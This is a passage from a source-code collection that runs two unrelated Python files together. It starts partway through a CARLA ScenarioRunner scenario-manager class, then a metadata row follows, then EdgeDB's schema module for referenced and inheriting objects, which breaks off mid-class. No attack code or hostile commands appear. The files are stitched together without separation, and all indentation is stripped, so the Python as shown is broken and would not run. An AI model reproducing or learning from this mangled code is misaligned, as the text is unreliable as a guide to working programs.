5. If needed, cleanup with manager.stop_scenario()
"""
def __init__(self, debug_mode=False, sync_mode=False, timeout=2.0):
"""
Sets up the parameters, which will be filled at load_scenario()
"""
self.scenario = None
self.scenario_tree = None
self.scenario_class = None
self.ego_vehicles = None
self.other_actors = None
self._debug_mode = debug_mode
self._agent = None
self._sync_mode = sync_mode
self._running = False
self._timestamp_last_run = 0.0
self._timeout = timeout
self._watchdog = Watchdog(float(self._timeout))
self.scenario_duration_system = 0.0
self.scenario_duration_game = 0.0
self.start_system_time = None
self.end_system_time = None
def _reset(self):
"""
Reset all parameters
"""
self._running = False
self._timestamp_last_run = 0.0
self.scenario_duration_system = 0.0
self.scenario_duration_game = 0.0
self.start_system_time = None
self.end_system_time = None
GameTime.restart()
def cleanup(self):
"""
This function triggers a proper termination of a scenario
"""
if self.scenario is not None:
self.scenario.terminate()
if self._agent is not None:
self._agent.cleanup()
self._agent = None
CarlaDataProvider.cleanup()
def load_scenario(self, scenario, agent=None):
"""
Load a new scenario
"""
self._reset()
self._agent = AgentWrapper(agent) if agent else None
if self._agent is not None:
self._sync_mode = True
self.scenario_class = scenario
self.scenario = scenario.scenario
self.scenario_tree = self.scenario.scenario_tree
self.ego_vehicles = scenario.ego_vehicles
self.other_actors = scenario.other_actors
# To print the scenario tree uncomment the next line
# py_trees.display.render_dot_tree(self.scenario_tree)
if self._agent is not None:
self._agent.setup_sensors(self.ego_vehicles[0], self._debug_mode)
def run_scenario(self):
"""
Trigger the start of the scenario and wait for it to finish/fail
"""
print("ScenarioManager: Running scenario {}".format(self.scenario_tree.name))
self.start_system_time = time.time()
start_game_time = GameTime.get_time()
self._watchdog.start()
self._running = True
while self._running:
timestamp = None
world = CarlaDataProvider.get_world()
if world:
snapshot = world.get_snapshot()
if snapshot:
timestamp = snapshot.timestamp
if timestamp:
self._tick_scenario(timestamp)
self._watchdog.stop()
self.cleanup()
self.end_system_time = time.time()
end_game_time = GameTime.get_time()
self.scenario_duration_system = self.end_system_time - \
self.start_system_time
self.scenario_duration_game = end_game_time - start_game_time
if self.scenario_tree.status == py_trees.common.Status.FAILURE:
print("ScenarioManager: Terminated due to failure")
def _tick_scenario(self, timestamp):
"""
Run next tick of scenario and the agent.
If running synchronously, it also handles the ticking of the world.
"""
if self._timestamp_last_run < timestamp.elapsed_seconds and self._running:
self._timestamp_last_run = timestamp.elapsed_seconds
self._watchdog.update()
if self._debug_mode:
print("\n--------- Tick ---------\n")
# Update game time and actor information
GameTime.on_carla_tick(timestamp)
CarlaDataProvider.on_carla_tick()
if self._agent is not None:
ego_action = self._agent()
# Tick scenario
self.scenario_tree.tick_once()
if self._debug_mode:
print("\n")
py_trees.display.print_ascii_tree(self.scenario_tree, show_status=True)
sys.stdout.flush()
if self.scenario_tree.status != py_trees.common.Status.RUNNING:
self._running = False
if self._agent is not None:
self.ego_vehicles[0].apply_control(ego_action)
if self._sync_mode and self._running and self._watchdog.get_status():
CarlaDataProvider.get_world().tick()
def get_running_status(self):
"""
returns:
bool: False if watchdog exception occurred, True otherwise
"""
return self._watchdog.get_status()
def stop_scenario(self):
"""
This function is used by the overall signal handler to terminate the scenario execution
"""
self._running = False
def analyze_scenario(self, stdout, filename, junit):
"""
This function is intended to be called from outside and provide
the final statistics about the scenario (human-readable, in the form of a junit
report, etc.)
"""
failure = False
timeout = False
result = "SUCCESS"
if self.scenario.test_criteria is None:
print("Nothing to analyze, this scenario has no criteria")
return True
for criterion in self.scenario.get_criteria():
if (not criterion.optional and
criterion.test_status != "SUCCESS" and
criterion.test_status != "ACCEPTABLE"):
failure = True
result = "FAILURE"
elif criterion.test_status == "ACCEPTABLE":
result = "ACCEPTABLE"
if self.scenario.timeout_node.timeout and not failure:
timeout = True
result = "TIMEOUT"
output = ResultOutputProvider(self, result, stdout, filename, junit)
output.write()
return failure or timeout
| 2.671875 | 3 |
edb/schema/referencing.py | disfated/edgedb | 0 | 3459 | #
# This source file is part of the EdgeDB open source project.
#
# Copyright 2008-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import *
import hashlib
from edb import errors
from edb.common import struct
from edb.edgeql import ast as qlast
from . import delta as sd
from . import inheriting
from . import objects as so
from . import schema as s_schema
from . import name as sn
from . import utils
ReferencedT = TypeVar('ReferencedT', bound='ReferencedObject')
ReferencedInheritingObjectT = TypeVar('ReferencedInheritingObjectT',
bound='ReferencedInheritingObject')
class ReferencedObject(so.DerivableObject):
#: True if the object has an explicit definition and is not
#: purely inherited.
is_local = so.SchemaField(
bool,
default=False,
inheritable=False,
compcoef=0.909,
reflection_method=so.ReflectionMethod.AS_LINK,
)
def get_subject(self, schema: s_schema.Schema) -> Optional[so.Object]:
# NB: classes that inherit ReferencedObject define a `get_subject`
# method dynamically, with `subject = SchemaField`
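# For illustration only, a subclass declaration might look roughly like the
# sketch below (hypothetical class name and field options, shown only to
# clarify the mechanism; the real subclasses may declare different options):
#
#     class SomeReferencedThing(ReferencedObject):
#         subject = so.SchemaField(so.Object, default=None,
#                                  compcoef=None, inheritable=False)
#
# the schema-field machinery then generates the get_subject() accessor.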
raise NotImplementedError
def get_referrer(self, schema: s_schema.Schema) -> Optional[so.Object]:
return self.get_subject(schema)
def delete(self, schema: s_schema.Schema) -> s_schema.Schema:
cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.DeleteObject, type(self))
cmd = cmdcls(classname=self.get_name(schema))
context = sd.CommandContext(
modaliases={},
schema=schema,
disable_dep_verification=True,
)
delta, parent_cmd = cmd._build_alter_cmd_stack(
schema, context, self)
parent_cmd.add(cmd)
with context(sd.DeltaRootContext(schema=schema, op=delta)):
schema = delta.apply(schema, context)
return schema
def derive_ref(
self: ReferencedT,
schema: s_schema.Schema,
referrer: so.QualifiedObject,
*qualifiers: str,
mark_derived: bool = False,
attrs: Optional[Dict[str, Any]] = None,
dctx: Optional[sd.CommandContext] = None,
derived_name_base: Optional[str] = None,
inheritance_merge: bool = True,
preserve_path_id: Optional[bool] = None,
refdict_whitelist: Optional[AbstractSet[str]] = None,
transient: bool = False,
name: Optional[str] = None,
**kwargs: Any,
) -> Tuple[s_schema.Schema, ReferencedT]:
if name is None:
derived_name: str = self.get_derived_name(
schema, referrer, *qualifiers,
mark_derived=mark_derived,
derived_name_base=derived_name_base)
else:
derived_name = name
if self.get_name(schema) == derived_name:
raise errors.SchemaError(
f'cannot derive {self!r}({derived_name}) from itself')
derived_attrs: Dict[str, object] = {}
if attrs is not None:
derived_attrs.update(attrs)
derived_attrs['name'] = derived_name
derived_attrs['bases'] = so.ObjectList.create(
schema, [self])
mcls = type(self)
referrer_class = type(referrer)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for_name(schema, derived_name)
refcoll = referrer.get_field_value(schema, refdict.attr)
existing = refcoll.get(schema, refname, default=None)
if existing is not None:
cmdcls: Type[sd.Command] = \
sd.ObjectCommandMeta.get_command_class_or_die(sd.AlterObject,
type(self))
else:
cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.CreateObject, type(self))
cmd = cmdcls(classname=derived_name)
for k, v in derived_attrs.items():
cmd.set_attribute_value(k, v)
if existing is not None:
new_bases = derived_attrs['bases']
old_bases = existing.get_bases(schema)
if new_bases != old_bases:
assert isinstance(new_bases, so.ObjectList)
removed_bases, added_bases = inheriting.delta_bases(
[b.get_name(schema) for b in old_bases.objects(schema)],
[b.get_name(schema) for b in new_bases.objects(schema)],
)
rebase_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
inheriting.RebaseInheritingObject, type(self))
rebase_cmd = rebase_cmdcls(
classname=derived_name,
added_bases=added_bases,
removed_bases=removed_bases,
)
cmd.add(rebase_cmd)
context = sd.CommandContext(
modaliases={},
schema=schema,
)
assert isinstance(cmd, sd.ObjectCommand)
delta, parent_cmd = cmd._build_alter_cmd_stack(
schema, context, self, referrer=referrer)
with context(sd.DeltaRootContext(schema=schema, op=delta)):
if not inheritance_merge:
context.current().inheritance_merge = False
if refdict_whitelist is not None:
context.current().inheritance_refdicts = refdict_whitelist
if mark_derived:
context.current().mark_derived = True
if transient:
context.current().transient_derivation = True
if preserve_path_id:
context.current().preserve_path_id = True
parent_cmd.add(cmd)
schema = delta.apply(schema, context)
derived: ReferencedT = schema.get(derived_name)
return schema, derived
def get_verbosename(
self,
schema: s_schema.Schema,
*,
with_parent: bool = False,
) -> str:
vn = super().get_verbosename(schema)
if with_parent:
subject = self.get_subject(schema)
if subject is not None:
pn = subject.get_verbosename(schema, with_parent=True)
return f'{vn} of {pn}'
return vn
class ReferencedInheritingObject(
so.DerivableInheritingObject,
ReferencedObject,
):
# Indicates that the object has been declared as
# explicitly inherited.
declared_overloaded = so.SchemaField(
bool,
default=False,
compcoef=None,
introspectable=False,
inheritable=False,
ephemeral=True,
)
def get_implicit_bases(
self: ReferencedInheritingObjectT,
schema: s_schema.Schema,
) -> List[ReferencedInheritingObjectT]:
return [
b for b in self.get_bases(schema).objects(schema)
if not b.generic(schema)
]
class ReferencedObjectCommandMeta(sd.ObjectCommandMeta):
_transparent_adapter_subclass: ClassVar[bool] = True
_referrer_context_class: Optional[
Type[sd.ObjectCommandContext[so.Object]]
] = None
def __new__(mcls,
name: str,
bases: Tuple[type, ...],
clsdct: Dict[str, Any],
*,
referrer_context_class: Optional[
Type[sd.ObjectCommandContext[so.Object]]
] = None,
**kwargs: Any
) -> ReferencedObjectCommandMeta:
cls = super().__new__(mcls, name, bases, clsdct, **kwargs)
assert isinstance(cls, ReferencedObjectCommandMeta)
if referrer_context_class is not None:
cls._referrer_context_class = referrer_context_class
return cls
class ReferencedObjectCommandBase(
sd.QualifiedObjectCommand[ReferencedT],
metaclass=ReferencedObjectCommandMeta,
):
@classmethod
def get_referrer_context_class(
cls,
) -> Type[sd.ObjectCommandContext[so.Object]]:
if cls._referrer_context_class is None:
raise TypeError(
f'referrer_context_class is not defined for {cls}')
return cls._referrer_context_class
@classmethod
def get_referrer_context(
cls,
context: sd.CommandContext,
) -> Optional[sd.ObjectCommandContext[so.Object]]:
"""Get the context of the command for the referring object, if any.
E.g. for a `create/alter/etc concrete link` command this would
be the context of the `create/alter/etc type` command.
"""
ctxcls = cls.get_referrer_context_class()
ctx = context.get(ctxcls) # type: ignore
return cast(Optional[sd.ObjectCommandContext[so.Object]], ctx)
@classmethod
def get_referrer_context_or_die(
cls,
context: sd.CommandContext,
) -> sd.ObjectCommandContext[so.Object]:
ctx = cls.get_referrer_context(context)
if ctx is None:
raise RuntimeError(f'no referrer context for {cls}')
return ctx
class StronglyReferencedObjectCommand(
ReferencedObjectCommandBase[ReferencedT]
):
pass
class ReferencedObjectCommand(ReferencedObjectCommandBase[ReferencedT]):
@classmethod
def _classname_from_ast(cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
context: sd.CommandContext
) -> sn.Name:
name = super()._classname_from_ast(schema, astnode, context)
parent_ctx = cls.get_referrer_context(context)
if parent_ctx is not None:
assert isinstance(parent_ctx.op, sd.QualifiedObjectCommand)
referrer_name = parent_ctx.op.classname
base_name: str
try:
base_ref = utils.ast_to_object(
astnode.name,
modaliases=context.modaliases,
schema=schema,
)
except errors.InvalidReferenceError:
base_name = sn.Name(name)
else:
base_name = base_ref.get_name(schema)
quals = cls._classname_quals_from_ast(
schema, astnode, base_name, referrer_name, context)
pnn = sn.get_specialized_name(base_name, referrer_name, *quals)
name = sn.Name(name=pnn, module=referrer_name.module)
assert isinstance(name, sn.Name)
return name
@classmethod
def _classname_from_name(
cls,
name: sn.SchemaName,
referrer_name: sn.SchemaName,
) -> sn.Name:
base_name = sn.shortname_from_fullname(name)
quals = cls._classname_quals_from_name(name)
pnn = sn.get_specialized_name(base_name, referrer_name, *quals)
return sn.Name(name=pnn, module=referrer_name.module)
@classmethod
def _classname_quals_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
base_name: str,
referrer_name: str,
context: sd.CommandContext,
) -> Tuple[str, ...]:
return ()
@classmethod
def _classname_quals_from_name(
cls,
name: sn.SchemaName,
) -> Tuple[str, ...]:
return ()
@classmethod
def _name_qual_from_exprs(cls,
schema: s_schema.Schema,
exprs: Iterable[str]) -> str:
m = hashlib.sha1()
for expr in exprs:
m.update(expr.encode())
return m.hexdigest()
def _get_ast_node(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> Type[qlast.DDLOperation]:
subject_ctx = self.get_referrer_context(context)
ref_astnode: Type[qlast.DDLOperation] = getattr(self,
'referenced_astnode',
None)
if subject_ctx is not None and ref_astnode is not None:
return ref_astnode
else:
if isinstance(self.astnode, (list, tuple)):
return self.astnode[1]
else:
return self.astnode
def _build_alter_cmd_stack(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: so.Object,
*,
referrer: Optional[so.Object] = None
) -> Tuple[sd.DeltaRoot, sd.Command]:
delta = sd.DeltaRoot()
if referrer is None:
assert isinstance(scls, ReferencedObject)
referrer = scls.get_referrer(schema)
obj = referrer
object_stack = []
if type(self) != type(referrer):
object_stack.append(referrer)
while obj is not None:
if isinstance(obj, ReferencedObject):
obj = obj.get_referrer(schema)
object_stack.append(obj)
else:
obj = None
cmd: sd.Command = delta
for obj in reversed(object_stack):
assert obj is not None
alter_cmd_cls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, type(obj))
alter_cmd = alter_cmd_cls(classname=obj.get_name(schema))
cmd.add(alter_cmd)
cmd = alter_cmd
return delta, cmd
class CreateReferencedObject(
ReferencedObjectCommand[ReferencedT],
sd.CreateObject[ReferencedT],
):
referenced_astnode: ClassVar[Type[qlast.ObjectDDL]]
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> sd.Command:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
if isinstance(astnode, cls.referenced_astnode):
objcls = cls.get_schema_metaclass()
referrer_ctx = cls.get_referrer_context_or_die(context)
referrer_class = referrer_ctx.op.get_schema_metaclass()
referrer_name = referrer_ctx.op.classname
refdict = referrer_class.get_refdict_for_class(objcls)
cmd.set_attribute_value(
refdict.backref_attr,
so.ObjectShell(
name=referrer_name,
schemaclass=referrer_class,
),
)
cmd.set_attribute_value('is_local', True)
if getattr(astnode, 'is_abstract', None):
cmd.set_attribute_value('is_abstract', True)
return cmd
def _get_ast_node(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> Type[qlast.DDLOperation]:
scls = self.get_object(schema, context)
assert isinstance(scls, ReferencedInheritingObject)
implicit_bases = scls.get_implicit_bases(schema)
if implicit_bases and not context.declarative:
mcls = self.get_schema_metaclass()
Alter = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, mcls)
alter = Alter(classname=self.classname)
return alter._get_ast_node(schema, context)
else:
return super()._get_ast_node(schema, context)
@classmethod
def as_inherited_ref_cmd(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
astnode: qlast.ObjectDDL,
parents: Any) -> sd.Command:
cmd = cls(classname=cls._classname_from_ast(schema, astnode, context))
cmd.set_attribute_value('name', cmd.classname)
return cmd
@classmethod
def as_inherited_ref_ast(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
name: str,
parent: ReferencedObject) -> qlast.ObjectDDL:
nref = cls.get_inherited_ref_name(schema, context, parent, name)
astnode_cls = cls.referenced_astnode
astnode = astnode_cls(name=nref)
assert isinstance(astnode, qlast.ObjectDDL)
return astnode
@classmethod
def get_inherited_ref_name(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
parent: ReferencedObject,
name: str
) -> qlast.ObjectRef:
# reduce name to shortname
if sn.Name.is_qualified(name):
shortname: str = sn.shortname_from_fullname(sn.Name(name))
else:
shortname = name
nref = qlast.ObjectRef(
name=shortname,
module=parent.get_shortname(schema).module,
)
return nref
def _create_innards(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
referrer_ctx = self.get_referrer_context(context)
if referrer_ctx is None:
return super()._create_innards(schema, context)
else:
referrer = referrer_ctx.scls
schema = self._create_ref(schema, context, referrer)
return super()._create_innards(schema, context)
def _create_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
referrer_cls = type(referrer)
mcls = type(self.scls)
refdict = referrer_cls.get_refdict_for_class(mcls)
schema = referrer.add_classref(schema, refdict.attr, self.scls)
return schema
class DeleteReferencedObjectCommand(
ReferencedObjectCommand[ReferencedT],
sd.DeleteObject[ReferencedT],
):
def _delete_innards(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
schema = super()._delete_innards(schema, context)
referrer_ctx = self.get_referrer_context(context)
if referrer_ctx is None:
return schema
else:
referrer = referrer_ctx.scls
schema = self._delete_ref(schema, context, referrer)
return schema
def _delete_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
scls = self.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
return referrer.del_classref(schema, refdict.attr, refname)
class ReferencedInheritingObjectCommand(
ReferencedObjectCommand[ReferencedInheritingObjectT],
inheriting.InheritingObjectCommand[ReferencedInheritingObjectT],
):
def _get_implicit_ref_bases(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.InheritingObject,
referrer_field: str,
fq_name: sn.SchemaName,
) -> List[ReferencedInheritingObjectT]:
assert isinstance(referrer, so.QualifiedObject)
child_referrer_bases = referrer.get_bases(schema).objects(schema)
implicit_bases = []
ref_field_type = type(referrer).get_field(referrer_field).type
for ref_base in child_referrer_bases:
fq_name_in_child = self._classname_from_name(
fq_name, ref_base.get_name(schema))
refname = ref_field_type.get_key_for_name(schema, fq_name_in_child)
parent_coll = ref_base.get_field_value(schema, referrer_field)
parent_item = parent_coll.get(schema, refname, default=None)
if (parent_item is not None
and not parent_item.get_is_final(schema)):
implicit_bases.append(parent_item)
return implicit_bases
def get_ref_implicit_base_delta(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refcls: ReferencedInheritingObjectT,
implicit_bases: List[ReferencedInheritingObjectT],
) -> inheriting.BaseDelta_T:
child_bases = refcls.get_bases(schema).objects(schema)
default_base = refcls.get_default_base_name()
explicit_bases = [
b for b in child_bases
if b.generic(schema) and b.get_name(schema) != default_base
]
new_bases = implicit_bases + explicit_bases
return inheriting.delta_bases(
[b.get_name(schema) for b in child_bases],
[b.get_name(schema) for b in new_bases],
)
def _validate(
self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> None:
scls = self.scls
implicit_bases = [
b for b in scls.get_bases(schema).objects(schema)
if not b.generic(schema)
]
referrer_ctx = self.get_referrer_context_or_die(context)
objcls = self.get_schema_metaclass()
referrer_class = referrer_ctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
if context.declarative and scls.get_is_local(schema):
if (implicit_bases
and refdict.requires_explicit_overloaded
and not self.get_attribute_value('declared_overloaded')):
ancestry = []
for obj in implicit_bases:
bref = obj.get_referrer(schema)
assert bref is not None
ancestry.append(bref)
raise errors.SchemaDefinitionError(
f'{self.scls.get_verbosename(schema, with_parent=True)} '
f'must be declared using the `overloaded` keyword because '
f'it is defined in the following ancestor(s): '
f'{", ".join(a.get_shortname(schema) for a in ancestry)}',
context=self.source_context,
)
elif (not implicit_bases
and self.get_attribute_value('declared_overloaded')):
raise errors.SchemaDefinitionError(
f'{self.scls.get_verbosename(schema, with_parent=True)}: '
f'cannot be declared `overloaded` as there are no '
f'ancestors defining it.',
context=self.source_context,
)
def _propagate_ref_op(self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: ReferencedInheritingObject,
cb: Callable[[sd.Command, str], None]
) -> s_schema.Schema:
rec = context.current().enable_recursion
context.current().enable_recursion = False
referrer_ctx = self.get_referrer_context_or_die(context)
referrer = referrer_ctx.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
r_alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, referrer_class)
alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, mcls)
for descendant in scls.ordered_descendants(schema):
d_name = descendant.get_name(schema)
assert isinstance(descendant, ReferencedObject)
d_referrer = descendant.get_referrer(schema)
assert d_referrer is not None
d_alter_cmd = alter_cmdcls(classname=d_name)
r_alter_cmd = r_alter_cmdcls(
classname=d_referrer.get_name(schema))
with r_alter_cmd.new_context(schema, context, d_referrer):
with d_alter_cmd.new_context(schema, context, descendant):
cb(d_alter_cmd, refname)
r_alter_cmd.add(d_alter_cmd)
schema = r_alter_cmd.apply(schema, context)
self.add(r_alter_cmd)
context.current().enable_recursion = rec
return schema
class CreateReferencedInheritingObject(
CreateReferencedObject[ReferencedInheritingObjectT],
inheriting.CreateInheritingObject[ReferencedInheritingObjectT],
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
):
def _get_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
refctx = type(self).get_referrer_context(context)
if refctx is not None:
if not self.get_attribute_value('is_local'):
if context.descriptive_mode:
astnode = super()._get_ast(
schema,
context,
parent_node=parent_node,
)
assert astnode is not None
inherited_from = [
sn.quals_from_fullname(b)[0]
for b in self.get_implicit_bases(
schema,
context,
self.get_attribute_value('bases'),
)
]
astnode.system_comment = (
f'inherited from {", ".join(inherited_from)}'
)
return astnode
else:
return None
else:
astnode = super()._get_ast(
schema, context, parent_node=parent_node)
if context.declarative:
scls = self.get_object(schema, context)
assert isinstance(scls, ReferencedInheritingObject)
implicit_bases = scls.get_implicit_bases(schema)
objcls = self.get_schema_metaclass()
referrer_class = refctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
if refdict.requires_explicit_overloaded and implicit_bases:
assert astnode is not None
astnode.declared_overloaded = True
return astnode
else:
return super()._get_ast(schema, context, parent_node=parent_node)
def _create_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
referrer_ctx = self.get_referrer_context(context)
implicit_bases = None
if referrer_ctx is not None and not context.canonical:
objcls = self.get_schema_metaclass()
referrer = referrer_ctx.scls
if isinstance(referrer, so.InheritingObject):
referrer_class = referrer_ctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
implicit_bases = self._get_implicit_ref_bases(
schema, context, referrer, refdict.attr, self.classname)
if implicit_bases:
bases = self.get_attribute_value('bases')
if bases:
bases = so.ObjectList.create(
schema,
implicit_bases + [
b for b in bases.objects(schema)
if b not in implicit_bases
],
)
else:
bases = so.ObjectList.create(
schema,
implicit_bases,
)
self.set_attribute_value('bases', bases)
schema = super()._create_begin(schema, context)
if referrer_ctx is not None and not context.canonical:
self._validate(schema, context)
return schema
def _create_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
schema = super()._create_ref(schema, context, referrer)
if (not self.scls.get_is_final(schema)
and isinstance(referrer, so.InheritingObject)
and not context.canonical
and context.enable_recursion):
# Propagate the creation of a new ref to descendants of
# our referrer.
schema = self._propagate_ref_creation(schema, context, referrer)
return schema
def _propagate_ref_creation(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.InheritingObject,
) -> s_schema.Schema:
get_cmd = sd.ObjectCommandMeta.get_command_class_or_die
mcls = type(self.scls)
referrer_cls = type(referrer)
alter_cmd = get_cmd(sd.AlterObject, referrer_cls)
ref_create_cmd = get_cmd(sd.CreateObject, mcls)
ref_alter_cmd = get_cmd(sd.AlterObject, mcls)
ref_rebase_cmd = get_cmd(inheriting.RebaseInheritingObject, mcls)
assert issubclass(ref_create_cmd, CreateReferencedInheritingObject)
assert issubclass(ref_rebase_cmd, RebaseReferencedInheritingObject)
refdict = referrer_cls.get_refdict_for_class(mcls)
parent_fq_refname = self.scls.get_name(schema)
for child in referrer.children(schema):
if not child.allow_ref_propagation(schema, context, refdict):
continue
alter = alter_cmd(classname=child.get_name(schema))
with alter.new_context(schema, context, child):
# This is needed to get the correct inherited name which will
# either be created or rebased.
ref_field_type = type(child).get_field(refdict.attr).type
refname = ref_field_type.get_key_for_name(
schema, parent_fq_refname)
astnode = ref_create_cmd.as_inherited_ref_ast(
schema, context, refname, self.scls)
fq_name = self._classname_from_ast(schema, astnode, context)
# We cannot check for ref existence in this child at this
# time, because it might get created in a sibling branch
# of the delta tree. Instead, generate a command group
# containing Alter(if_exists) and Create(if_not_exists)
# to postpone that check until the application time.
ref_create = ref_create_cmd.as_inherited_ref_cmd(
schema, context, astnode, [self.scls])
ref_create.if_not_exists = True
ref_create.set_attribute_value(refdict.backref_attr, child)
if child.get_is_derived(schema):
# All references in a derived object must
# also be marked as derived, to be consistent
# with derive_subtype().
ref_create.set_attribute_value('is_derived', True)
ref_alter = ref_alter_cmd(classname=fq_name, if_exists=True)
ref_alter.add(ref_rebase_cmd(
classname=fq_name,
implicit=True,
added_bases=(),
removed_bases=(),
))
alter.add(ref_alter)
alter.add(ref_create)
self.add(alter)
return schema
def get_implicit_bases(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
bases: Any,
) -> Sequence[str]:
mcls = self.get_schema_metaclass()
default_base = mcls.get_default_base_name()
if isinstance(bases, so.ObjectCollectionShell):
base_names = [
b.name for b in bases.items if b.name is not None
]
else:
assert isinstance(bases, so.ObjectList)
base_names = list(bases.names(schema))
# Filter out explicit bases
implicit_bases = [
b
for b in base_names
if (
b != default_base
and isinstance(b, sn.SchemaName)
and sn.shortname_from_fullname(b) != b
)
]
return implicit_bases
class AlterReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
inheriting.AlterInheritingObject[ReferencedInheritingObjectT],
):
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> AlterReferencedInheritingObject[ReferencedInheritingObjectT]:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
refctx = cls.get_referrer_context(context)
if refctx is not None:
cmd.set_attribute_value('is_local', True)
assert isinstance(cmd, AlterReferencedInheritingObject)
return cmd
def _alter_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
scls = self.scls
was_local = scls.get_is_local(schema)
schema = super()._alter_begin(schema, context)
now_local = scls.get_is_local(schema)
if not was_local and now_local:
self._validate(schema, context)
return schema
class RebaseReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
inheriting.RebaseInheritingObject[ReferencedInheritingObjectT],
):
implicit = struct.Field(bool, default=False)
def apply(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
if not context.canonical and self.implicit:
mcls = self.get_schema_metaclass()
refctx = self.get_referrer_context_or_die(context)
referrer = refctx.scls
assert isinstance(referrer, so.InheritingObject)
refdict = type(referrer).get_refdict_for_class(mcls)
implicit_bases = self._get_implicit_ref_bases(
schema,
context,
referrer=referrer,
referrer_field=refdict.attr,
fq_name=self.classname,
)
scls = self.get_object(schema, context)
removed_bases, added_bases = self.get_ref_implicit_base_delta(
schema,
context,
scls,
implicit_bases=implicit_bases,
)
self.added_bases = added_bases
self.removed_bases = removed_bases
return super().apply(schema, context)
class RenameReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
sd.RenameObject,
):
def _rename_begin(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> s_schema.Schema:
orig_schema = schema
schema = super()._rename_begin(schema, context)
scls = self.scls
if not context.canonical and not scls.generic(schema):
implicit_bases = scls.get_implicit_bases(schema)
non_renamed_bases = set(implicit_bases) - context.renamed_objs
# This object is inherited from one or more ancestors that
# are not renamed in the same op, and this is an error.
if non_renamed_bases:
bases_str = ', '.join(
b.get_verbosename(schema, with_parent=True)
for b in non_renamed_bases
)
verb = 'are' if len(non_renamed_bases) > 1 else 'is'
vn = scls.get_verbosename(orig_schema)
raise errors.SchemaDefinitionError(
f'cannot rename inherited {vn}',
details=(
f'{vn} is inherited from '
f'{bases_str}, which {verb} not being renamed'
),
context=self.source_context,
)
if context.enable_recursion:
schema = self._propagate_ref_rename(schema, context, scls)
else:
for op in self.get_subcommands(type=sd.ObjectCommand):
schema = op.apply(schema, context)
return schema
def _propagate_ref_rename(self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: ReferencedInheritingObject
) -> s_schema.Schema:
rename_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.RenameObject, type(scls))
def _ref_rename(alter_cmd: sd.Command,
refname: str) -> None:
astnode = rename_cmdcls.astnode(
new_name=qlast.ObjectRef(
name=refname,
),
)
rename_cmd = rename_cmdcls._rename_cmd_from_ast(
schema, astnode, context)
alter_cmd.add(rename_cmd)
return self._propagate_ref_op(schema, context, scls, cb=_ref_rename)
class DeleteReferencedInheritingObject(
DeleteReferencedObjectCommand[ReferencedInheritingObjectT],
inheriting.DeleteInheritingObject[ReferencedInheritingObjectT],
